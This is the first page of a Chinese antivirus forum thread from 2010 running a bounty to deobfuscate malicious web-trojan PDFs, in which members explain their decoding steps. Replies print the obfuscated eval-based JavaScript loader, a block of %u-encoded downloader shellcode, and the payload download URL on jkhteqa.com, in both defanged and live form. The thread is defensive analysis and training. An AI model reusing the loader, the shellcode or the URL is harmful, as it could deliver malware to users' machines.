瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第四十八期(已结束)

123   1  /  3  页   跳转

[悬赏] 网马解密悬赏第四十八期(已结束)

网马解密悬赏第四十八期(已结束)



引用:
解密文件见附件,请使用老版的redoce进行解密,工具见附件




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

附件附件:

文件名:d4759d.rar
下载次数:7705
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-9 11:02:49
描述:rar

附件附件:

文件名:decoder.rar
下载次数:438
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-9 11:02:49
描述:rar

最后编辑networkedition 最后编辑于 2010-04-12 10:13:01
分享到:
gototop
 

回复:网马解密悬赏第四十八期

还没人上,我给你捧场吧~

hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013


本帖被评分 1 次
gototop
 

回复: 网马解密悬赏第四十八期

没看明白.解压后,只看到  var googleA=this;var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);var a=["Word","","getPa","geNth"];unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]);var getAdobe=["Pag","mWo","get","rds","eNu",""];mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]);var b=["s","n","a","e","c","u","e","p",""];d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]);var google=["deA","cha","rCo","t",""];mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]);var googleC=["","harCo","fromC","de"];dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]);var googleGet=["a","p","","p"];get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]);var adobe=String("%");var aA=2;var mailGet=String;var bB=0;var editSend=100;var get=googleA[get];var getD=2;var aEdit=googleA[d];var c=googleA[mail](getD);var googleB="";for(var googleCUnlock=bB;googleCUnlock<c;googleCUnlock+=1){sendD=googleA[unlockAdobe](getD,googleCUnlock);var adobeD=sendD.substr(sendD.length-aA,aA);var googleMail=aEdit(adobe+adobeD);var sendDSend=googleMail[mailGoogle](bB);var mailB=sendDSend^editSend;googleB+=mailGet[dD](mailB);}this[unlock](googleB);

真不知是如何解出地址来的.
gototop
 

回复: 网马解密悬赏第四十八期

哎呀我又干了件傻事
忘了清空缓存了,解了一个原来的pdf。。。

hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013]http://jkhteqa.com:3126/download/banner.php?spl=pdf_2013



汗死

疯了疯了。。。。禁用url识别也不好使,改成hxxp行了吧
最后编辑念初 最后编辑于 2010-04-09 21:48:11
感染不是你的错
不能修复就是你的不对了
遇到问题请附截图和sreng日志
gototop
 

回复: 网马解密悬赏第四十八期

在线解密http://wepawet.iseclab.org/index.php

http://jkhteqa.com:3126/download/banner.php?spl=pdf_2013
要深入,要专一.......
gototop
 

回复:网马解密悬赏第四十八期

来晚了
得到PDF代码之后 发现是 eval 加密
解密之后得到一段shellcode代码

%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455


生成exe之后OD调试得到
hxxp://jkhteqa.com:3126/download/banner.php?spl=pdf_2013
最后编辑梅罗 最后编辑于 2010-04-10 17:52:00
天地间那一抹不灭的流光 即我
gototop
 

回复:网马解密悬赏第四十八期

这是什么东东?
gototop
 

回复 6F 梅罗 的帖子

膜拜一下.得到PDF代码之后 发现是 eval 加密
如何看出来的.?
gototop
 

回复: 网马解密悬赏第四十八期



var googleA=this;var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);var a=["Word","","getPa","geNth"];unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]);var getAdobe=["Pag","mWo","get","rds","eNu",""];mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]);var b=["s","n","a","e","c","u","e","p",""];d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]);var google=["deA","cha","rCo","t",""];mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]);var googleC=["","harCo","fromC","de"];dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]);var googleGet=["a","p","","p"];get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]);var adobe=String("%");var aA=2;var mailGet=String;var bB=0;var editSend=100;var get=googleA[get];var getD=2;var aEdit=googleA[d];var c=googleA[mail](getD);var googleB="";for(var googleCUnlock=bB;googleCUnlock<c;googleCUnlock+=1){sendD=googleA[unlockAdobe](getD,googleCUnlock);var adobeD=sendD.substr(sendD.length-aA,aA);var googleMail=aEdit(adobe+adobeD);var sendDSend=googleMail[mailGoogle](bB);var mailB=sendDSend^editSend;googleB+=mailGet[dD](mailB);}this[unlock](googleB);


var send=["","e","l","a","v"];unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]);
即是 unlock = eval ;
再看末尾:this[unlock](googleB);
即是:this[eval](googleB);
第一怀疑的就是eval加密,然后加密代码在eval弹出的窗口里
最后编辑梅罗 最后编辑于 2010-04-10 16:54:06
天地间那一抹不灭的流光 即我
gototop
 

回复 9F 梅罗 的帖子

这一段就能解出?
gototop
 
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT